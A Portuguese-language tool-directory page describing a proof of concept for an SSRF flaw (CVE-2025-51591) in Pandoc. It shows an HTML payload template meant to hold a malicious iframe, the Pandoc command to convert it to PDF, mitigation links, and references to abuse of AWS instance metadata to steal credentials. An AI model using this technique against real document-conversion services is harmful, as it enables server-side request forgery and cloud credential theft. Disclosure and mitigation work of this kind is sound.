Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-51591-Pandoc-SSRF-POC — CVE-2025-51591 Prova de Conceito da vulnerabilidade SSRF Pandoc | Kitploit
Ferramentas/GitHubGitHub/malayke/cve-2025-51591-pandoc-ssrf-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubmalayke/cve-2025-51591-pandoc-ssrf-poc

CVE-2025-51591-Pandoc-SSRF-POC

CVE-2025-51591 Prova de Conceito da vulnerabilidade SSRF Pandoc

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
1há 10 mesesAinda não revisado

CVE-2025-51591 POC de SSRF no Pandoc

image

Uma Server-Side Request Forgery (SSRF) no JGM Pandoc v3.6.4 permite que atacantes obtenham acesso e comprometam toda a infraestrutura ao injetar um iframe malicioso.

Instalar Pandoc

  • https://pandoc.org/installing.html

Exemplo de Payload

⚠️ substitua a url do iframe pela sua própria url OAST. ⚠️

root@kitploit:~
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CVE-2025-51591 Proof Of Concept</title>
</head>

<body>
    <h1>
        CVE-2025-51591 Proof Of Concept
    </h1>
    
</body>

</html>

Converter Payload para PDF Usando Pandoc

root@kitploit:~
pandoc payload.html -o output1.pdf
image

Estratégias de Mitigação

  • https://github.com/jgm/pandoc/issues/10682#issuecomment-2718343529
  • https://pandoc.org/MANUAL.html#a-note-on-security

Referências

  • Hackers Exploram Pandoc CVE-2025-51591 para Atacar AWS IMDS e Roubar Credenciais IAM do EC2
  • IMDS Abusado: Caçando Comportamentos Raros para Revelar Explorações
  • SSRF ao Gerar PDFs a partir de HTML Controlado pelo Usuário
Baixar ferramenta